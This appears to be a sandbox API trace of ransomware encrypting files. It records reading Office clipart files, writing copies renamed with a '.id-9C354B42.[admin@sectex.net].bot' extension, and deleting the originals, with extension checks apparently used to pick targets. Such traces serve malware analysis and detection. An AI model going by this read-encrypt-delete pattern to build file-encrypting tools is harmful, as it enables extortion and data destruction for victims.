	[0057.939] WriteFile (in: hFile=0x23c, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x33d0, lpOverlapped=0x0) returned 1
	[0058.004] ReadFile (in: hFile=0x21c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.004] WriteFile (in: hFile=0x23c, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.004] SetEndOfFile (hFile=0x23c) returned 1
	[0058.371] CloseHandle (hObject=0x23c) returned 1
	[0058.371] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.371] SetEndOfFile (hFile=0x21c) returned 1
	[0058.372] CloseHandle (hObject=0x21c) returned 1
	[0058.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.372] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 1
	[0058.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.673] lstrlenW (lpString=".doc") returned 4
	[0058.673] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0058.673] lstrlenW (lpString=".docx") returned 5
	[0058.673] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0058.673] lstrlenW (lpString=".pdf") returned 4
	[0058.673] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0058.673] lstrlenW (lpString=".xls") returned 4
	[0058.673] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0058.673] lstrlenW (lpString=".xlsx") returned 5
	[0058.673] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0058.673] lstrlenW (lpString=".ppt") returned 4
	[0058.673] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0058.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.673] lstrlenW (lpString=".zip") returned 4
	[0058.673] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0058.673] lstrlenW (lpString=".rar") returned 4
	[0058.673] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0058.673] lstrlenW (lpString=".bz2") returned 4
	[0058.674] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0058.674] lstrlenW (lpString=".7z") returned 3
	[0058.674] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0058.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.674] lstrlenW (lpString=".dbf") returned 4
	[0058.674] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0058.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.674] lstrlenW (lpString=".1cd") returned 4
	[0058.674] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0058.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.674] lstrlenW (lpString=".jpg") returned 4
	[0058.674] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0058.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.674] lstrlenW (lpString=".doc") returned 4
	[0058.674] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0058.674] lstrlenW (lpString=".docx") returned 5
	[0058.674] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0058.674] lstrlenW (lpString=".pdf") returned 4
	[0058.674] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0058.674] lstrlenW (lpString=".xls") returned 4
	[0058.674] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0058.674] lstrlenW (lpString=".xlsx") returned 5
	[0058.674] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0058.674] lstrlenW (lpString=".ppt") returned 4
	[0058.674] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0058.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.674] lstrlenW (lpString=".zip") returned 4
	[0058.674] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0058.674] lstrlenW (lpString=".rar") returned 4
	[0058.674] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0058.674] lstrlenW (lpString=".bz2") returned 4
	[0058.674] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0058.674] lstrlenW (lpString=".7z") returned 3
	[0058.674] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0058.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.675] lstrlenW (lpString=".dbf") returned 4
	[0058.675] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0058.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.675] lstrlenW (lpString=".1cd") returned 4
	[0058.675] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0058.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63
	[0058.675] lstrlenW (lpString=".jpg") returned 4
	[0058.675] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0058.675] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.675] lstrlenW (lpString="AN01084_.WMF") returned 12
	[0058.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.339] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1832) returned 1
	[0059.339] CloseHandle (hObject=0x178) returned 1
	[0059.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 0x20
	[0059.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.339] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.340] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0059.340] GetLastError () returned 0x0
	[0059.340] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x728, lpOverlapped=0x0) returned 1
	[0059.342] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x730, lpOverlapped=0x0) returned 1
	[0059.342] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.342] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.343] SetEndOfFile (hFile=0x194) returned 1
	[0059.343] CloseHandle (hObject=0x194) returned 1
	[0059.343] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.343] SetEndOfFile (hFile=0x178) returned 1
	[0059.344] CloseHandle (hObject=0x178) returned 1
	[0059.344] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 1
	[0059.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.344] lstrlenW (lpString=".doc") returned 4
	[0059.344] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.344] lstrlenW (lpString=".docx") returned 5
	[0059.344] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.344] lstrlenW (lpString=".pdf") returned 4
	[0059.344] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.344] lstrlenW (lpString=".xls") returned 4
	[0059.344] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.344] lstrlenW (lpString=".xlsx") returned 5
	[0059.344] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.344] lstrlenW (lpString=".ppt") returned 4
	[0059.344] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString=".zip") returned 4
	[0059.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.345] lstrlenW (lpString=".rar") returned 4
	[0059.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString=".bz2") returned 4
	[0059.345] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString=".7z") returned 3
	[0059.345] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString=".dbf") returned 4
	[0059.345] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString=".1cd") returned 4
	[0059.345] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString=".jpg") returned 4
	[0059.345] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString=".doc") returned 4
	[0059.345] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString=".docx") returned 5
	[0059.345] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.345] lstrlenW (lpString=".pdf") returned 4
	[0059.345] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString=".xls") returned 4
	[0059.345] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.345] lstrlenW (lpString=".xlsx") returned 5
	[0059.345] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.345] lstrlenW (lpString=".ppt") returned 4
	[0059.345] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.345] lstrlenW (lpString=".zip") returned 4
	[0059.346] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.346] lstrlenW (lpString=".rar") returned 4
	[0059.346] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.346] lstrlenW (lpString=".bz2") returned 4
	[0059.346] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.346] lstrlenW (lpString=".7z") returned 3
	[0059.346] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.346] lstrlenW (lpString=".dbf") returned 4
	[0059.346] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.346] lstrlenW (lpString=".1cd") returned 4
	[0059.346] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63
	[0059.346] lstrlenW (lpString=".jpg") returned 4
	[0059.346] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.346] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.346] lstrlenW (lpString="AN04235_.WMF") returned 12
	[0059.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.346] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=7804) returned 1
	[0059.346] CloseHandle (hObject=0x178) returned 1
	[0059.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 0x20
	[0059.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.347] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.347] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0059.347] GetLastError () returned 0x0
	[0059.347] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x1e7c, lpOverlapped=0x0) returned 1
	[0059.349] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1e80, lpOverlapped=0x0) returned 1
	[0059.350] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.350] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.350] SetEndOfFile (hFile=0x194) returned 1
	[0059.350] CloseHandle (hObject=0x194) returned 1
	[0059.351] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.351] SetEndOfFile (hFile=0x178) returned 1
	[0059.351] CloseHandle (hObject=0x178) returned 1
	[0059.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.352] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 1
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.353] lstrlenW (lpString=".doc") returned 4
	[0059.353] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString=".docx") returned 5
	[0059.353] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.353] lstrlenW (lpString=".pdf") returned 4
	[0059.353] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString=".xls") returned 4
	[0059.353] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.353] lstrlenW (lpString=".xlsx") returned 5
	[0059.353] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.353] lstrlenW (lpString=".ppt") returned 4
	[0059.353] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.353] lstrlenW (lpString=".zip") returned 4
	[0059.353] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.353] lstrlenW (lpString=".rar") returned 4
	[0059.353] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString=".bz2") returned 4
	[0059.353] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString=".7z") returned 3
	[0059.353] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.353] lstrlenW (lpString=".dbf") returned 4
	[0059.353] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.353] lstrlenW (lpString=".1cd") returned 4
	[0059.353] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.353] lstrlenW (lpString=".jpg") returned 4
	[0059.353] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.354] lstrlenW (lpString=".doc") returned 4
	[0059.354] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString=".docx") returned 5
	[0059.354] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.354] lstrlenW (lpString=".pdf") returned 4
	[0059.354] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString=".xls") returned 4
	[0059.354] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.354] lstrlenW (lpString=".xlsx") returned 5
	[0059.354] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.354] lstrlenW (lpString=".ppt") returned 4
	[0059.354] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.354] lstrlenW (lpString=".zip") returned 4
	[0059.354] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.354] lstrlenW (lpString=".rar") returned 4
	[0059.354] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString=".bz2") returned 4
	[0059.354] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString=".7z") returned 3
	[0059.354] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.354] lstrlenW (lpString=".dbf") returned 4
	[0059.354] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.354] lstrlenW (lpString=".1cd") returned 4
	[0059.354] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63
	[0059.354] lstrlenW (lpString=".jpg") returned 4
	[0059.354] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.354] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.355] lstrlenW (lpString="AN04267_.WMF") returned 12
	[0059.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.355] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=7804) returned 1
	[0059.355] CloseHandle (hObject=0x178) returned 1
	[0059.355] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf")) returned 0x20
	[0059.355] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.355] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.355] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0059.356] GetLastError () returned 0x0
	[0059.356] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x1e7c, lpOverlapped=0x0) returned 1
	[0059.357] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1e80, lpOverlapped=0x0) returned 1
